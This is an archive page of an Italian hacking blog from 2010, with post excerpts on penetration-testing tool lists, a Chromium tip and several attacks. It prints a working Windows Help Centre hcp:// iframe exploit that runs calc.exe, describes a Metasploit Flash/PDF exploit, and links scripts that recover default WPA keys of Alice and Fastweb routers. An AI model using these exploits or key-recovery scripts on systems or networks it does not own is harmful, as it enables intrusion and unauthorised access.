Categorie:


Translate:
Italiano flagInglese flagFrancese flagTedesco flagPortoghese flagSpagnolo flag

Archivio: ‘Software’

[tutorial]Tool for Privilege Escalation

giugno 23rd, 2010 by clshack

Letture consigliate:
[tutorial]Tool for Information Gathering
[tutorial]Tool for Network Mapping

[tutorial]Tool for Vulnerability Identification level Server
[tutorial]Tool for Vulnerability Identification level WEB

Da wikipedia, leggiamo:

Privilege escalation o in italiano scalata dei privilegi è l’atto di sfruttare una falla in un software applicativo per ottenere l’accesso a risorse che normalmente sarebbero protette da un’applicazione o dall’utente.
Il risultato è che l’applicazione esegue azioni con più privilegi di quelli dovuti e voluti dallo sviluppatore o dall’amministratore di sistema.


Pensate, ad esempio se su un server riuscissimo ad avere i privilegi root :D
In questo articolo, vedremo dei tools, che ci permettono di “scalare i privilegi”, cioè di ottenere privilegi root su linux e system su windows.
(continua…)

Tags: , , , , , , ,
Posted in GNU/Linux, Hacking, Software | 6 Comments »

[CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution

giugno 20th, 2010 by clshack

E dopo la gente, si chiede come fanno i virus ad entrare nei loro computer WINDOWS… fino che usate software buggati, per lo più lenti e schifosi, come flash player… speriamo che HTML 5 porti via tutto questo ;)

In tanto vediamo come sfruttare questa vulnerabilità per adobe flash palyer, con metasploit :D

Adobe Flash Player “newfunction” Invalid Pointer Use

CVE-2010-1297
This exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player.
Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code executiong is achieved by embedding a specially crafted Flash movie into a PDF document.
An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled.

Platforms Affected:

  • Adobe Acrobat 9.0 Standard
  • Adobe Acrobat 9.0
  • Adobe Acrobat 9.0.0
  • Adobe Acrobat 9.1
  • Adobe Acrobat 9.1 Standard

    • (continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | 7 Comments »

[tutorial]Tool for Vulnerability Identification level WEB

giugno 19th, 2010 by clshack

Ed eccomi di nuovo, in questo articolo, parleremo di tool, per il penetration-test, a livello di applicazioni web.
Molte volte troviamo siti defacciati, beh non è sempre colpa dei cms vulnerabili, dipende anche da modifiche da noi apportate, che magari li rendono poco sicuri.
E dopo, vi trovate index cosi:

Dopo queste:
[tutorial]Tool for Information Gathering
 [tutorial]Tool for Network Mapping
[tutorial]Tool for Vulnerability Identification level Server

Vediamo ora come identificare vulnerabilità, a livello di web applications…
I tools, da me proposti sono i seguenti:

    ===WEB VULNERABILITY SCANNER===
  • Wapiti: Web application security Scanner
  • Grendel-Scan:web application security testing tool
  • SkipFish: Google security Scanner
  • Websecurify
  • w3af:Web Application Attack and Audit Framework
  • SqlMap
  • Fimap: Scanner LFI(Local File Inclusion ) and RFI(Remote File Inclusion)

    • ===FINGER PLUGIN AND VERSION===

  • WhatWeb
  • Plecost: A WordPress Penetration-Test for Plugins
  • OWASP Joomla Vulnerability Scanner

    • ===CODE ANALYTICS===

  • RIPS:source code analyser for vulnerabilities in PHP
  • RATS: Rough Auditing Tool for Security
  • Pixy

(continua…)

Tags: , , , , , ,
Posted in GNU/Linux, Hacking, Software | No Comments »

[UBUNTU]Velocizzare il database di Chromium

giugno 11th, 2010 by clshack

AGGIORNATO.

Come saprete, chromium, è la versione originale di google chrome.

Se non lo avete installato, vi consiglio di farlo, subito, visto le prestazioni:
Installare Chromium su Ubuntu e derivati

chromium

Chromium, come lo stesso chrome oppure firefox, memorizza la cronologia, bookmark, segnalibri feed, impostazioni e quant’altro in file di database sql lite.

Aggiungi, rimuovi,crea e elimina, fanno si che queste tabelle diventino lentissime !!!

Oggi per aprire una nuova scheda mi ci volevano 30 secondi :(
(continua…)

Tags: , ,
Posted in GNU/Linux, Software | 14 Comments »

WPA ALICE AND FASTEB REVERSE :)

giugno 10th, 2010 by clshack

Gli amici del wifiresearchers sono riusciti a trovare l’algoritmo con il quale una password viene generata partendo dall ESSID.

Mente il nostro amico evilsocket, ha creato lo scriptino in php che mette in pratica le ricerche.
Lo script per fastweb, è compatibile con:

00:08:27 Pirelli Broadband Solutions
00:13:C8 Pirelli Broadband Solutions
00:17:C2 Pirelli Broadband Solutions
00:19:3E Pirelli Broadband Solutions
00:1C:A2 Pirelli Broadband Solutions
00:1D:8B Pirelli Broadband Solutions
00:22:33 Pirelli Broadband Solutions
00:23:8E Pirelli Broadband Solutions
00:25:53 Pirelli Broadband Solutions
00:03:6F Telsey S.p.A. (in fase di Test)
00:21:96 Telsey S.p.A. (in fase di Test)

Mentre per alice siamo messi così:
Alice-96xxxxxx
Alice-93xxxxxx
Alice-56xxxxxx
Alice-55xxxxxx
Alice-54xxxxxx
Alice-48xxxxxx
Alice-46xxxxxx
Altre serie di alice, si trovano online ;)

Articoli orinali:
Script per il calcolo della chiave WPA dei router FastWeb Pirelli.

Script per il calcolo della chiave WPA dei router Alice Gate VoIP 2 Plus Wi-Fi

Mentre qui c’è il download degli script:
DOWNLOAD WPA-ALICE
DOWNLOAD WPA-PIRELLI

Per facilitare la ricerca delle reti wifi, ho scritto un mini scanner che estrae i parametri dal comando iwlist :D

Perciò funziona solo su linux :D FUCK WINDOWS :D
La sua sintassi è:
sudo nome.php INTERFACCIA_DI_RETE
Es:
sudo wifi.php wlan0

DOWNLOAD WIFI-SCANNER

Buon divertimento :D

P.S. Non vorrei vedere gente che mi chiede perché gli script non si compilano o altro -.-’
Esistono i forum per qualcosa :D

Tags: ,
Posted in GNU/Linux, Servizi WEB, Software | 14 Comments »

[EXPLOIT]Windows Help Centre Remote code Excution

giugno 10th, 2010 by clshack

Un altro exploit per windows, che permette l’esecuzione di comandi sul pc della vittima.
Bisogna passare a linux :D

Ma vediamo come funziona questo exploit, chiamato:
Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

Questo exploit, sfruttando i file asx possiamo aprire il windows help con un url malformato e far aprire ad esempio la
calcolatrice :D

I file asx, sono:

An ASX file (Advanced Stream Redirector) is a special type of file which works closely with Windows Media ASF files.

L’url malformato in questione è composto cosi:
<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">
(continua…)

Tags: , , , , , ,
Posted in Hacking, Software, Windows | 1 Comment »

[tutorial]Tool for Vulnerability Identification level Server

giugno 9th, 2010 by clshack

Dopo queste:
[tutorial]Tool for Network Mapping
[tutorial]Tool for Information Gathering
Ora parleremo di Tool for Vulnerability Identification level Server.

Categoria distinta a livello server, non farò come in backtrack che mettono tutto assieme, tool per l’sql injection assieme a tool per l’exploited di vulnerabilità a livello server, cioènon di applicazzioni web, per quello che posso cerco di dividere.
Penso che dopo si capisca anche meglio…
Sicuramente, non metterò mai tool come wapiti insieme a tool come openvas.

Per questa categoria, ho selezionato questi tools:

  • nessus
  • openvas
  • Checkpwd
  • Nikto
  • OpenSSL-Scanner
  • Onesixtyone
  • ettercap
  • medusa2

Purtroppo non posso soffermarmi su tutti questi ottimi tool, comunque il loro funzionamento è abbastanza semplice :D e se googlate un po’ troverete :D
(continua…)

Tags: , , , , , ,
Posted in GNU/Linux, Software, Windows | 1 Comment »

[tutorial]Tool for Network Mapping

giugno 5th, 2010 by clshack

Abbiamo visto in precedenza questi tool:[tutorial]Tool for Information Gathering

Ora vedremo, come mappare una rete, per capire, a cosa ci troviamo difronte, macchine, sistemi operativi, servizi, router,firewall e quant’altro.

Ho selezionato per alcuni tool, che ritengo utili ad effettuare operazioni di network mapping ;)

Network Mapping:

  • Angry IP Scanner
  • AutoScan NetWork
  • LanMap
  • nMap
  • Traceroute
  • Ping

Ho praticamente già parlato di tutti questi tool sul blog, ma rivediamoli :D

Il primo tool, forse il meno conosciuto, Angry IP Scanner.

Angry IP Scanner, scritto in java, e presente in backtrack permette di scansionare un range di ip per capire quali sono attivi o meno.
Molto semplice da usare, grazie a una comoda interfaccia grafica :D

Riconosce se un pc attivo grazie ad un uso combinato di queste 3 tecniche:

  • ICMP ECHO [ping]
  • ICMP ECHO [alternative]
  • UDP packet
  • TCP port probe

(continua…)

Tags: , , , , , ,
Posted in GNU/Linux, Hacking, Software | 7 Comments »

[tutorial]Tool for Information Gathering

giugno 2nd, 2010 by clshack

Information Gathering, ovvero come reperire informazioni da sistemi remoti e non.
Questa fase, è molto utile in un approccio ad esempio con il penetration-test.

Diciamo che prima di attaccare, bisogna sapere “cosa c’è dietro”, e questa fase ci permette di raccogliere numerose informazioni, come email, numeri di telefono, o altro utili anche per effettuare un social attack.

In backTrack, vengono messi in questa categoria, numeri software, io ne ho selezionati alcuni.
Non dico che gli altri non vadano bene, anzi , ma non posso parlare di 30 tool :D

  • theHarvester, Email, User names and Subdomain/Hostnames finder[presente in backtrack]
  • Maltego 2[presente in backtrack]
  • Fierce Domain Scan
  • httprint is a web server fingerprinting tool. [presente in backtrack]
  • DirBuster

Partiamo dal primo: theHarvester, Email, User names and Subdomain/Hostnames finder.

Questo semplice tool, scritto in python presente in backtrack, con il nome di goog email enum.

Questo tool, come dalla descrizione, permette di trovare:

  • Email;
  • User names;
  • Subdomain/Hostnames;

Sfruttando google, o altri servizi di ricerca come linklin o bing ;)
Vediamo come usarlo.
Ho messo il pacchetto sul mio sito per facilitare eventuali cambi di indirizzo ;)
Apriamo la nostra console :D
wget http://www.clshack.it/nopaste/theHarvester-1.6.tar
tar -xvf theHar*.tar
cd theH*
Bene adesso digitiamo, per un help:
python theHarvester.py
Esempio:
python theHarvester.py -d SITO_DA_CERCARE -l 100 -b bing
Ho usato bing, perché mi sa che google mi richiedeva il captcha, mi ha individuato non umano :)
(continua…)

Tags: , , , , , , , ,
Posted in GNU/Linux, Hacking, Software | 4 Comments »

Wapiti: Web application security Scanner

maggio 30th, 2010 by clshack

Questo ottimo scanner per siti web, scritto in python e opensource è un’ottima alternativa ad acunetix.

Grazie a wapiti, potremo testare le vulnerabilità dei nostri siti web, in modo automatico ;)

Dal sito ufficiale, ecco cosa ci offre wapiti:

Wapiti is a vulnerability scanner for web applications.
It currently search vulnerabilities like XSS, SQL and XPath injections, file inclusions, command execution, LDAP injections, CRLF injections…
It use the Python programming language.


Wapiti, può individuare le seguenti vulnerabilità:
(continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software, Windows | 2 Comments »
« Older Entries
Newer Entries »